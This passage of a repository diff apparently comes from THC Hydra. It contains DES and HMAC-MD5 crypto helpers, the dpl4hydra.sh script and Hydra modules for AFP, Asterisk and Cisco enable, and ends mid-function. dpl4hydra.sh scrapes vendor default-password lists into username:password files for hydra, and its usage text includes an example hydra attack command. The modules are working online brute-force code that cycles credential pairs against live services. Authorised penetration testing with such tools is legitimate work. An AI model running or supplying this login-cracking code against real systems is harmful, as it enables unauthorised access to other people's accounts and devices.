0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L
};
static unsigned long SP4[64] = {
0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L
};
static unsigned long SP5[64] = {
0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L
};
static unsigned long SP6[64] = {
0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L
};
static unsigned long SP7[64] = {
0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L
};
static unsigned long SP8[64] = {
0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L
};
static void desfunc(block, keys)
register unsigned long *block, *keys;
{
register unsigned long fval, work, right, leftt;
register int round;
leftt = block[0];
right = block[1];
work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
right ^= work;
leftt ^= (work << 4);
work = ((leftt >> 16) ^ right) & 0x0000ffffL;
right ^= work;
leftt ^= (work << 16);
work = ((right >> 2) ^ leftt) & 0x33333333L;
leftt ^= work;
right ^= (work << 2);
work = ((right >> 8) ^ leftt) & 0x00ff00ffL;
leftt ^= work;
right ^= (work << 8);
right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
work = (leftt ^ right) & 0xaaaaaaaaL;
leftt ^= work;
right ^= work;
leftt = ((leftt << 1) | ((leftt >> 31) & 1L)) & 0xffffffffL;
for (round = 0; round < 8; round++) {
work = (right << 28) | (right >> 4);
work ^= *keys++;
fval = SP7[work & 0x3fL];
fval |= SP5[(work >> 8) & 0x3fL];
fval |= SP3[(work >> 16) & 0x3fL];
fval |= SP1[(work >> 24) & 0x3fL];
work = right ^ *keys++;
fval |= SP8[work & 0x3fL];
fval |= SP6[(work >> 8) & 0x3fL];
fval |= SP4[(work >> 16) & 0x3fL];
fval |= SP2[(work >> 24) & 0x3fL];
leftt ^= fval;
work = (leftt << 28) | (leftt >> 4);
work ^= *keys++;
fval = SP7[work & 0x3fL];
fval |= SP5[(work >> 8) & 0x3fL];
fval |= SP3[(work >> 16) & 0x3fL];
fval |= SP1[(work >> 24) & 0x3fL];
work = leftt ^ *keys++;
fval |= SP8[work & 0x3fL];
fval |= SP6[(work >> 8) & 0x3fL];
fval |= SP4[(work >> 16) & 0x3fL];
fval |= SP2[(work >> 24) & 0x3fL];
right ^= fval;
}
right = (right << 31) | (right >> 1);
work = (leftt ^ right) & 0xaaaaaaaaL;
leftt ^= work;
right ^= work;
leftt = (leftt << 31) | (leftt >> 1);
work = ((leftt >> 8) ^ right) & 0x00ff00ffL;
right ^= work;
leftt ^= (work << 8);
work = ((leftt >> 2) ^ right) & 0x33333333L;
right ^= work;
leftt ^= (work << 2);
work = ((right >> 16) ^ leftt) & 0x0000ffffL;
leftt ^= work;
right ^= (work << 16);
work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
leftt ^= work;
right ^= (work << 4);
*block++ = right;
*block = leftt;
return;
}
/* Validation sets:
*
* Single-length key, single-length plaintext -
* Key : 0123 4567 89ab cdef
* Plain : 0123 4567 89ab cde7
* Cipher : c957 4425 6a5e d31d
*
* Double-length key, single-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210
* Plain : 0123 4567 89ab cde7
* Cipher : 7f1d 0a77 826b 8aff
*
* Double-length key, double-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210
* Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff
* Cipher : 27a0 8440 406a df60 278f 47cf 42d6 15d7
*
* Triple-length key, single-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567
* Plain : 0123 4567 89ab cde7
* Cipher : de0b 7c06 ae5e 0ed5
*
* Triple-length key, double-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567
* Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff
* Cipher : ad0d 1b30 ac17 cf07 0ed1 1c63 81e4 4de5
*
* d3des V5.0a rwo 9208.07 18:44 Graven Imagery
**********************************************************************/

56
d3des.h Normal file
View file

@ -0,0 +1,56 @@
/*
* This is D3DES (V5.09) by Richard Outerbridge with the double and
* triple-length support removed for use in VNC.
*
* These changes are:
* Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*/
/* d3des.h -
*
* Headers and defines for d3des.c
* Graven Imagery, 1992.
*
* Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge
* (GEnie : OUTER; CIS : [71755,204])
*/
#define EN0 0 /* MODE == encrypt */
#define DE1 1 /* MODE == decrypt */
extern void deskey(unsigned char *, int);
/* hexkey[8] MODE
* Sets the internal key register according to the hexadecimal
* key contained in the 8 bytes of hexkey, according to the DES,
* for encryption or decryption according to MODE.
*/
extern void usekey(unsigned long *);
/* cookedkey[32]
* Loads the internal key register with the data in cookedkey.
*/
extern void cpkey(unsigned long *);
/* cookedkey[32]
* Copies the contents of the internal key register into the storage
* located at &cookedkey[0].
*/
extern void des(unsigned char *, unsigned char *);
/* from[8] to[8]
* Encrypts/Decrypts (according to the key currently loaded in the
* internal key register) one block of eight bytes at address 'from'
* into the block at address 'to'. They can be the same.
*/
/* d3des.h V5.09 rwo 9208.04 15:06 Graven Imagery
********************************************************************/

187
dpl4hydra.sh Executable file
View file

@ -0,0 +1,187 @@
#!/bin/sh
#
# Name: dpl4hydra
# Version: 0.9.9
# Date: 2012-04-16
# Author: Roland Kessler / Twitter: @rokessler
# Synopsis: Generates a (d)efault (p)assword (l)ist as input for THC hydra.
# Credits: Thanks to van Hauser for support and fixing portability issues.
# "The universe is an intelligence test." -Timothy Leary (R.I.P.)
INSTALLDIR=/usr/local
LOCATION=etc
usage ()
{
cat <<EOF
dpl4hydra v0.9.9 (c) 2012 by Roland Kessler (@rokessler)
Syntax: `basename $0` [help] | [refresh] | [BRAND] | [all]
This script depends on a local (d)efault (p)assword (l)ist called
${FULLFILE}. If it is not available, regenerate it with
'`basename $0` refresh'. Source of the default password list is
$SITE
Options:
help Help: Show this message
refresh Refresh list: Download the full (d)efault (p)assword (l)ist
and generate a new local ${FULLFILE} file. Takes time!
BRAND Generates a (d)efault (p)assword (l)ist from the local file
${FULLFILE}, limiting the output to BRAND systems, using
the format username:password (as required by THC hydra).
The output file is called dpl4hydra_BRAND.lst.
all Dump list of all systems credentials into dpl4hydra_all.lst.
Example:
# `basename $0` linksys
File dpl4hydra_linksys.lst was created with 20 entries.
# hydra -C ./dpl4hydra_linksys.lst -t 1 192.168.1.1 http-get /index.asp
EOF
}
refresh ()
{
echo
echo "Trying to locate wget or curl... " | tr -d "\n"
which wget >/dev/null 2>&1 && FETCH="wget -q -O -"
which curl >/dev/null 2>&1 && FETCH="curl -s"
if [ -n "$FETCH" ]; then
echo "done."
echo "Using `echo $FETCH | cut -d ' ' -f 1` for downloading data."
echo
else
echo
echo "ERROR: Cannot refresh the list without wget or curl. Aborting." >&2
echo
exit 1
fi
echo "Trying to download list of vendors from"
echo "${SITE}... " | tr -d "\n"
$FETCH $SITE > $INDEXSITE 2>/dev/null || { echo; echo; echo "ERROR: Downloading data to disk failed. Network down?" >&2; echo; rm $INDEXSITE; exit 1; }
echo "done."
echo
cat $INDEXSITE | grep td | awk -F"\"" '{ print $8 }' | grep http > $SUBSITES
rm $INDEXSITE
if [ -r $FULLFILE ]; then
echo "Moving existing password list to ${OLDFILE}."
echo
mv $FULLFILE $OLDFILE || { echo "ERROR: Moving file $FULLFILE failed. Please check." >&2; echo; exit 1; }
fi
for SUBSITE in `cat $SUBSITES`; do
VENDOR=`echo $SUBSITE | awk -F"-" '{ print $3 }' | sed 's/.htm//'`
echo "Downloading default passwords for ${VENDOR}... " | tr -d "\n"
$FETCH $SUBSITE | grep -i tr | grep -i td | grep -i celltext | sed 's/<[^>]*>/,/g' | sed 's/,,*/,/g' | sed 's/^,//g' | tr -d "\r" >dpl4hydra_${VENDOR}.tmp || { echo "not found - skipping... " | tr -d "\n" ; }
while read SYSTEM; do
echo "${VENDOR}," | tr -d "\n" >> $FULLFILE
echo "$SYSTEM" >> $FULLFILE
done < dpl4hydra_${VENDOR}.tmp
rm dpl4hydra_${VENDOR}.tmp
echo "done."
done
rm $SUBSITES
if [ ! -r $LOCALFILE ]; then
echo
echo "ERROR: Cannot access local file ${LOCALFILE}. Skipping." >&2
echo
else
echo
echo "Merging download with ${LOCALFILE}... " | tr -d "\n"
cat $LOCALFILE >> $FULLFILE || { echo; echo "ERROR: Merging of $FULLFILE and $LOCALFILE failed. Please check." >&2; echo; exit 1; }
echo "done."
fi
echo "Cleaning up and sorting ${FULLFILE}... " | tr -d "\n"
cat $FULLFILE | sed 's/(null)//g' | sed 's/(Null)//g' | sed 's/(NULL)//g' | sed 's/(blank)//g' | sed 's/(Blank)//g' | sed 's/(BLANK)//g' | sed 's/(none)//g' | sed 's/(None)//g' | sed 's/(NONE)//g' | sed 's/none//g' | sed 's/n\/a//g' | sed 's/&lt;/</g' | sed 's/&gt;/>/g' | sed 's/&nbsp;//g' | sort | uniq > $CLEANFILE
mv $CLEANFILE $FULLFILE
echo "done."
echo
echo "Refreshed (d)efault (p)assword (l)ist $FULLFILE"
echo "was created with `wc -l $FULLFILE | awk '{ print $1 }'` entries."
echo
}
generate ()
{
HYDRAFILE=`echo "dpl4hydra_${BRAND}.lst" | tr '/ =:@\\|;<>"'"'" '_____________'`
if [ ! -r $FULLFILE ]; then
echo
echo "ERROR: Cannot access input file ${FULLFILE}" >&2
echo " You can rebuild it with '`basename $0` refresh'." >&2
echo
echo " Trying to use $LOCALFILE instead... " | tr -d "\n"
if [ -r $LOCALFILE ]; then
FULLFILE=$LOCALFILE
echo "done."
else
echo
echo "ERROR: Cannot access local file ${LOCALFILE}. Aborting." >&2
echo
exit 1
fi
fi
cat $FULLFILE 2>/dev/null | grep -i "$PATTERN" | awk -F"," '{ print $5":"$6 }' | sed 's/^[ \t]*//' | sed 's/[ \t]*$//' | sort | uniq > $HYDRAFILE
ENTRIES=`wc -l $HYDRAFILE | awk '{ print $1 }'`
if [ "$ENTRIES" -eq 0 ]; then
rm -f $HYDRAFILE
echo
echo "ERROR: No matching entries found for $BRAND systems." >&2
echo " File $HYDRAFILE was not created." >&2
echo
exit 1
else
if [ "$ENTRIES" -eq 1 ]; then
echo
echo "File $HYDRAFILE was created with one entry."
echo
else
echo
echo "File $HYDRAFILE was created with $ENTRIES entries."
echo
fi
fi
}
LC_ALL=C
export LC_ALL
DPLPATH="."
test -r "$DPLPATH/dpl4hydra_full.csv" || DPLPATH="$INSTALLDIR/$LOCATION"
FULLFILE="$DPLPATH/dpl4hydra_full.csv"
OLDFILE="$DPLPATH/dpl4hydra_full.old"
LOCALFILE="$DPLPATH/dpl4hydra_local.csv"
INDEXSITE="$DPLPATH/dpl4hydra_index.tmp"
SUBSITES="$DPLPATH/dpl4hydra_subs.tmp"
CLEANFILE="$DPLPATH/dpl4hydra_clean.tmp"
SITE="http://open-sez.me/passwd.htm"
case $# in
0) usage
exit 0;;
1) OPT=`echo $1 | tr "[A-Z]" "[a-z]"`;;
*) echo
echo "ERROR: Too many options." >&2
usage
exit 1;;
esac
case "$OPT" in
"-h" | "help" | "-help" | "--help") usage;;
"-r" | "refresh" | "-refresh" | "--refresh") refresh;;
"-a" | "all" | "-all" | "--all") PATTERN=","
BRAND="all"
generate;;
*) PATTERN="${OPT}"
BRAND="$OPT"
generate;;
esac

8807
dpl4hydra_full.csv Executable file
View file

File diff suppressed because it is too large Load diff

8807
dpl4hydra_local.csv Executable file
View file

File diff suppressed because it is too large Load diff

135
hmacmd5.c Normal file
View file

@ -0,0 +1,135 @@
/*
Unix SMB/CIFS implementation.
HMAC MD5 code for use in NTLMv2
Copyright (C) Luke Kenneth Casson Leighton 1996-2000
Copyright (C) Andrew Tridgell 1992-2000
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
/* taken direct from rfc2104 implementation and modified for suitable use
* for ntlmv2.
*/
#ifdef LIBOPENSSL
#include <string.h>
#include "hmacmd5.h"
#define ZERO_STRUCT(x) memset((char *)&(x), 0, sizeof(x))
/***********************************************************************
the rfc 2104 version of hmac_md5 initialisation.
***********************************************************************/
void hmac_md5_init_rfc2104(const unsigned char *key, int key_len, HMACMD5Context * ctx) {
int i;
unsigned char tk[16];
/* if key is longer than 64 bytes reset it to key=MD5(key) */
if (key_len > 64) {
MD5_CTX tctx;
MD5_Init(&tctx);
MD5_Update(&tctx, (void *) key, key_len);
MD5_Final(tk, &tctx);
key = tk;
key_len = 16;
}
/* start out by storing key in pads */
ZERO_STRUCT(ctx->k_ipad);
ZERO_STRUCT(ctx->k_opad);
memcpy(ctx->k_ipad, key, key_len);
memcpy(ctx->k_opad, key, key_len);
/* XOR key with ipad and opad values */
for (i = 0; i < 64; i++) {
ctx->k_ipad[i] ^= 0x36;
ctx->k_opad[i] ^= 0x5c;
}
MD5_Init(&ctx->ctx);
MD5_Update(&ctx->ctx, ctx->k_ipad, 64);
}
/***********************************************************************
the microsoft version of hmac_md5 initialisation.
***********************************************************************/
void hmac_md5_init_limK_to_64(const unsigned char *key, int key_len, HMACMD5Context * ctx) {
int i;
/* if key is longer than 64 bytes truncate it */
if (key_len > 64) {
key_len = 64;
}
/* start out by storing key in pads */
ZERO_STRUCT(ctx->k_ipad);
ZERO_STRUCT(ctx->k_opad);
memcpy(ctx->k_ipad, key, key_len);
memcpy(ctx->k_opad, key, key_len);
/* XOR key with ipad and opad values */
for (i = 0; i < 64; i++) {
ctx->k_ipad[i] ^= 0x36;
ctx->k_opad[i] ^= 0x5c;
}
MD5_Init(&ctx->ctx);
MD5_Update(&ctx->ctx, ctx->k_ipad, 64);
}
/***********************************************************************
update hmac_md5 "inner" buffer
***********************************************************************/
void hmac_md5_update(const unsigned char *text, int text_len, HMACMD5Context * ctx) {
MD5_Update(&ctx->ctx, (void *) text, text_len); /* then text of datagram */
}
/***********************************************************************
finish off hmac_md5 "inner" buffer and generate outer one.
***********************************************************************/
void hmac_md5_final(unsigned char *digest, HMACMD5Context * ctx)
{
MD5_CTX ctx_o;
MD5_Final(digest, &ctx->ctx);
MD5_Init(&ctx_o);
MD5_Update(&ctx_o, ctx->k_opad, 64);
MD5_Update(&ctx_o, digest, 16);
MD5_Final(digest, &ctx_o);
}
/***********************************************************
single function to calculate an HMAC MD5 digest from data.
use the microsoft hmacmd5 init method because the key is 16 bytes.
************************************************************/
void hmac_md5(unsigned char key[16], unsigned char *data, int data_len, unsigned char *digest) {
HMACMD5Context ctx;
hmac_md5_init_limK_to_64(key, 16, &ctx);
if (data_len != 0) {
hmac_md5_update(data, data_len, &ctx);
}
hmac_md5_final(digest, &ctx);
}
#endif

40
hmacmd5.h Normal file
View file

@ -0,0 +1,40 @@
/*
Unix SMB/CIFS implementation.
Interface header: Scheduler service
Copyright (C) Luke Kenneth Casson Leighton 1996-1999
Copyright (C) Andrew Tridgell 1992-1999
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <openssl/md5.h>
#ifndef _HMAC_MD5_H
typedef struct {
MD5_CTX ctx;
unsigned char k_ipad[65];
unsigned char k_opad[65];
} HMACMD5Context;
#endif /* _HMAC_MD5_H */
void hmac_md5_init_rfc2104(const unsigned char *key, int key_len, HMACMD5Context *ctx);
void hmac_md5_init_limK_to_64(const unsigned char* key, int key_len,HMACMD5Context *ctx);
void hmac_md5_update(const unsigned char *text, int text_len, HMACMD5Context *ctx);
void hmac_md5_final(unsigned char *digest, HMACMD5Context *ctx);
void hmac_md5( unsigned char key[16], unsigned char *data, int data_len, unsigned char *digest);

184
hydra-afp.c Normal file
View file

@ -0,0 +1,184 @@
/*
* Apple Filing Protocol Support - by David Maciejak @ GMAIL dot com
*
* tested with afpfs-ng 0.8.1
* AFPFS-NG: http://alexthepuffin.googlepages.com/home
*
*/
#include "hydra-mod.h"
#ifndef LIBAFP
void dummy_afp() {
printf("\n");
}
#else
#define FREE(x) \
if (x != NULL) { \
free(x); \
x = NULL; \
}
#include <stdio.h>
#include <afpfs-ng/afp.h>
#include <afpfs-ng/libafpclient.h>
extern char *HYDRA_EXIT;
void stdout_fct(void *priv, enum loglevels loglevel, int logtype, const char *message) {
//fprintf(stderr, "[ERROR] Caught unknown error %s\n", message);
}
static struct libafpclient afpclient = {
.unmount_volume = NULL,
.log_for_client = stdout_fct,
.forced_ending_hook = NULL,
.scan_extra_fds = NULL,
.loop_started = NULL,
};
static int server_subconnect(struct afp_url url) {
struct afp_connection_request *conn_req;
struct afp_server *server = NULL;
conn_req = malloc(sizeof(struct afp_connection_request));
server = malloc(sizeof(struct afp_server));
memset(conn_req, 0, sizeof(struct afp_connection_request));
conn_req->url = url;
conn_req->url.requested_version = 31;
//fprintf(stderr, "AFP connection - username: %s password: %s server: %s\n", url.username, url.password, url.servername);
if (strlen(url.uamname) > 0) {
if ((conn_req->uam_mask = find_uam_by_name(url.uamname)) == 0) {
fprintf(stderr, "[ERROR] Unknown UAM: %s", url.uamname);
FREE(conn_req);
FREE(server);
return -1;
}
} else {
conn_req->uam_mask = default_uams_mask();
}
//fprintf(stderr, "Initiating connection attempt.\n");
if ((server = afp_server_full_connect(NULL, conn_req)) == NULL) {
FREE(conn_req);
FREE(server);
return -1;
}
//fprintf(stderr, "Connected to server: %s via UAM: %s\n", server->server_name_printable, uam_bitmap_to_string(server->using_uam));
FREE(conn_req);
FREE(server);
return 0;
}
int start_afp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
struct afp_url tmpurl;
/* Build AFP authentication request */
libafpclient_register(&afpclient);
afp_main_quick_startup(NULL);
init_uams();
afp_default_url(&tmpurl);
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
strncpy(tmpurl.servername, hydra_address2string(ip), AFP_SERVER_NAME_LEN - 1);
tmpurl.servername[AFP_SERVER_NAME_LEN] = 0;
memcpy(&tmpurl.username, login, AFP_MAX_USERNAME_LEN);
memcpy(&tmpurl.password, pass, AFP_MAX_PASSWORD_LEN);
if (server_subconnect(tmpurl) == 0) {
hydra_report_found_host(port, ip, "afp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
} else {
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
}
return 1;
}
void service_afp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_AFP;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_afp(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_afp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

137
hydra-asterisk.c Normal file
View file

@ -0,0 +1,137 @@
//This plugin was written by david@
//
//This plugin is written for Asterisk Call Manager
//which is running by default on TCP/5038
//
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_asterisk(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[1024];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
memset(buffer, 0, sizeof(buffer));
sprintf(buffer, "Action: Login\r\nUsername: %.250s\r\nSecret: %.250s\r\n\r\n", login, pass);
if (verbose || debug)
hydra_report(stderr, "[VERBOSE] C: %s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (verbose || debug)
hydra_report(stderr, "[VERBOSE] S: %s\n", buf);
if (buf == NULL || (strstr(buf, "Response: ") == NULL)) {
hydra_report(stderr, "[ERROR] Asterisk Call Manager protocol error or service shutdown: %s\n", buf);
free(buf);
return 4;
}
if (strstr(buf, "Response: Success") != NULL) {
hydra_report_found_host(port, ip, "asterisk", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_asterisk(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ASTERISK, mysslport = PORT_ASTERISK_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = myport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
buf = hydra_receive_line(sock);
//fprintf(stderr, "%s\n",buf);
//banner should look like:
//Asterisk Call Manager/1.1
if (buf == NULL || strstr(buf, "Asterisk Call Manager/") == NULL) {
/* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an Asterisk Call Manager protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_asterisk(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_asterisk_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

207
hydra-cisco-enable.c Normal file
View file

@ -0,0 +1,207 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_cisco_enable(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass, buffer[300];
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "%.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
